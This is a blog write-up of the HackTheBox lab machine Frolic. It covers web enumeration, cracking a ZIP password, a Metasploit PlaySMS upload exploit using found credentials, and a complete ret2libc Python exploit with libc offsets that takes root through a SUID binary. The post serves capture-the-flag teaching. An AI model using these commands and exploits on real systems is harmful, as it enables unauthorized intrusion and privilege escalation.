Power belongs to the people who take it

WriteUp – Frolic (HackTheBox)

In this post we will resolve the machine Frolic from HackTheBox.
It’s a Medium level Linux machine that will help us understand about the development of exploits with NX but withoutASLR, ret-2-libc.

My nick in HackTheBox is: manulqwerty. If you have any proposal or correction do not hesitate to leave a comment.
Also, if you do not know what a ret2libc exploit is, here is a guide I did a while ago: Return to libc guide
Besides the written write-up , for this machine I made a video (I tried to do it as short as possible, if you want to see a detailed explanation I recommend the videos of IppSec).

Video

Write-Up

Enumeration

As always, the first thing will be a scan of all the ports with nmap :

nmap -sC -sV 10.10.10.111


As you can see, there is a SSH, a SMB and an HTTP.

We will enumerate the web with dirsearch recursively.

dirsearch -u http://frolic.htb:9999/ -r -e php -t 50 -x 403


Accessing to http://frolic.htb/admin/success.html we see a code Okk!

In http://frolic.htb/asdiSIAJJ0QWE9JAS we find a base64 that after decoding it we see that it is a ZIP with a password.

We can brute force the zip with fcrackzip:

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt fr.zip


The ZIP contains a file index.php that is an hexadecimal code. We translate the hexadecimal to ascii, getting a base64 that contains a brainfuck code.

After decoding the Brainfuck code, we get: idkwhatispass
Reviewing the results of Dirsearch we see that there’s a http://frolic.htb/dev/backup

With the credentials admin:idkwhatispass we can access the playsms.

Exploitation

The PlaySMS is vulnerable, we can get shell through a metasploit module: multi/http/playsms_uploadcsv_exec

use multi/http/playsms_uploadcsv_exec
set rhosts 10.10.10.111
set lhost tun0
set rport 9999    
set targeturi /playsms/
set password idkwhatispass

Post-Exploitation

To access the root user, we will have to be able to develop an exploit for a binary with the NX bit activated but without ASLR in the system. I will use the ret2libc technique.
The first thing is to look for binaries with the SUID bit active using find:

find / -perm -4000 2>/dev/null


We found the binary: /home/ayush/.binary/rop that belongs to the root user.
Check that ASLR is disabled:

cat /proc/sys/kernel/randomize_va_space


As we saw in the ret-2-libc guide, we need the length of our padding and the system, exit and /bin/sh addresses in the libc library.
We are going to make a template that we will be completing:

import struct

def m32(dir):
    return struct.pack("I",dir)

padding = 
base = 
sys = m32(base + )
exit = m32(base + )
binsh = m32(base + )

print padding + sys + exit + binsh

Let’s find the length of our padding with msf-pattern:

The length of our fill will be 52 bytes, let’s look for the addresses of the libc library, system, exit and /bin/sh.

Our exploit:

import struct

def m32(dir):
    return struct.pack("I",dir)

padding = "A" * 52
base = 0xb7e19000
sys = m32(base + 0x0003ada0)
exit = m32(base + 0x0002e9d0)
binsh = m32(base + 0x15ba0b)

print padding + sys + exit + binsh

Let’s execute it

./rop $(python /tmp/exploit)

¿Me ayudas a compatirlo?

1 Comment

  1. Zaiuss

    Grande Manu. Muy bien explicado, me he enterado hasta yo. La capacidad de sistesis siempre fué clave para un buen write-up y veo que lo dominas tan bien como el aspecto técnico.

    No sé lo que acabo de decir, pero concluyo que está usted sanísimo. jeje

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

© 2024 ironHackers

Theme by Anders NorenUp ↑